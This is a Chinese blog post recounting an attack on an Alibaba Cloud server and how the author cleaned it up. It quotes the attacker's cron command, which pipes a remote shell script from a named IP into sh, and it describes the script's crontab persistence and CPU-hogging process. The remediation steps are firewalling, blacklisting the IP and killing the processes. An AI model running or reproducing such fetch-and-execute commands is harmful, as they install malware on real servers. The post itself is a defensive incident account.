记一次阿里云黑客攻击事件
这几天服务器一直发生异常行为,阿里云报警如下:
根据执行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,后台某个进程一直从这个美国的IP地址下载sh可执行文件
访问这个地址:http://165.225.157.157:8000/i.sh
看到执行语句如下:
大概明白,意思是定时从这个地址获取sh可执行文件,然后添加到定时任务crontab,还生成了ddgs.3010文件不断后台执行。
So,第一步,查看crontab -l ,果然有
那么显而易见,执行:crontab -r 删除掉cron任务。
第二步,安装firewall,具体操作,参考我的另外一篇博客:https://blog.csdn.net/u012259256/article/details/61018892
限制固定的访问端口:
第三步,其实阿里云后台提供了安全组策略,可以完成防火墙的功能,而且更加方便配置,配置如下(并且把165.225.157.157加入黑名单,不允许访问):
第四步,kill掉这些恶毒的进程,MD
用top命令,实时查看进程占用情况
(PS:因为进程已经被我kill掉,所以看不到数据啦)
没有kill之前,有一个恶意进程CPU占用198%,还有ddgs.3010进程,一直后台运行。总之,找到PID,然后kill就可以!
---------------------------------------------
总结:买了服务器一定记得先安装防火墙,或者设置安全策略!
Yeager
记一次阿里云黑客攻击事件相关推荐
- 记一次阿里云linux服务器中毒处理
记一次阿里云linux服务器中毒处理 事件 定位进程 人肉筛查 clamav 来源 参考 事件 阿里云告警: 您的云服务器(XXXXX)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(XXX)的 ...
- 记一次阿里云服务器CPU长期100%发现被被种挖矿程序解决的过程(一摸一样,只是没查到怎么进来的,入侵)
centos 7 记一次阿里云服务器被被种挖矿程序解决的过程 1.原因 偶尔发现我的服务器CPU使用率长期处于100%,就登上服务器看了一下 2.查看进程 1 [root@izwz94xp1kwkca ...
- 尤金·卡巴斯基:卡巴斯基实验室调查内网遭黑客攻击事件
猫宁!!! 尤金·卡巴斯基介绍: 尤金·卡巴斯基出生于黑海沿岸的新罗西斯克,父亲担任工程师,母亲是书库管理员.母亲常买许多数学杂志供其阅读.他在16岁就跳级进入密码.电信与计算机科学学院就读,从198 ...
- 记录一次阿里云服务器被攻击事件
收到阿里云的攻击提示消息 直接导致的问题 服务器不能访问外网(准确的说是不能访问外网的80端口,例如:curl www.baidu.com,就获取不到任何信息.但是 curl https://www. ...
- EOS Dapps已成黑客攻击事件
导读:本文盘点了近期EOS Dapps上影响较大的安全事件以及漏洞解读,同时以开发者的角度对EOS生态和"Code is Law"进行点评,严格执行Code is law,会增加用 ...
- 记一次阿里云k8s部署-测试存储
记一次阿里云k8s部署 阿里云资源准备 服务器 ip 角色 资源 192.168.1.160 master1 2核4G 192.168.1.161 master2 2核4G 192.168.1.162 ...
- 4月17日黑客攻击事件简讯
4月17日黑客攻击事件简讯 内蒙古赤峰林西委组织部 - www.lxxdj.gov.cn 快照:http://www.hack-cn.com/view/41443 甘肃崇信公安局 - www.cxga ...
- 外媒评选过去25年10大黑客攻击事件
据国外媒体报道,美国新闻网站The Daily Beast日前评选出了过去25年中10大最具破坏性的黑客攻击事件.上周由一群匿名黑客进行的无休止的网络攻击,为众多政府和企业的网络管理员带来了恐慌.上周 ...
- 史上最大规模黑客攻击事件曝光,数百万人的个人信息遭到泄露
最近一次史无前例的黑客攻击事件,令全球亿万人的个人信息遭到泄露.据报道,黑客组织 "暗影卫士" 攻击了全球最大的云计算服务提供商之一,窃取了该公司几百万用户的个人信息,包括姓名.电 ...
最新文章
- MySQL百万级、千万级数据多表关联SQL语句调优
- 硬核!一文梳理经典图网络模型
- win32 创建进程三种方式简单示例 - 使用CFree
- mysql中有主键和外键吗_谈谈mysql的主键和外键
- VS2010设置全局Include和Lib目录
- .NET Core 3.0 可卸载程序集原理简析
- JavaScript 学习随记——==和===及常见元素的真假值
- Hadoop学习笔记
- alwayson 增加节点_用于AlwaysON高可用性的域控制器和域客户端节点设置
- php 日期转毫秒_高性能的PHP日志系统 SeasLog 使用
- Python 微信自动发送消息
- IBM GPFS并行文件系统
- 视觉尺寸测量设备系统
- Java多用户商城系统B2B2C源码-(九)服务链路追踪(Spring Cloud Sleuth)
- mysql高性能学习笔记03_【MySQL】《高性能MySQL》 学习笔记,第三章,服务器性能剖析...
- vivo怎么切换为Android,vivox60pro如何切换系统 一键切换手机不通系统方法
- python 图片数据集批量打标签
- 复旦大学2015--2016学年第二学期高等代数II期末考试情况分析
- Import Netscaler VPX10.5 to Hyper-V 2012R2
- 网站访问量等数据统计
热门文章
- Matlab:连续按键、移动鼠标、鼠标点击、鼠标连点、输入字符,10行代码即可。
- Resetting first dirty offset of __consumer_offsets
- 【Java进阶营】Java是什么?Java的特点有哪些?
- 【计算机毕业设计】133在线课程管理系统
- 修正逆解文章——六轴UR机械臂正逆运动学求解_MATLAB代码(标准DH参数表)
- Mac:TexStudio 中文论文模版
- 研究生必备快速查找翻译阅读外文文献方法
- kmcuda: GPU加速 Kmeans
- Oracle 19c 安装步骤(超详细)
- 服务器最高安全防御策略选择与差异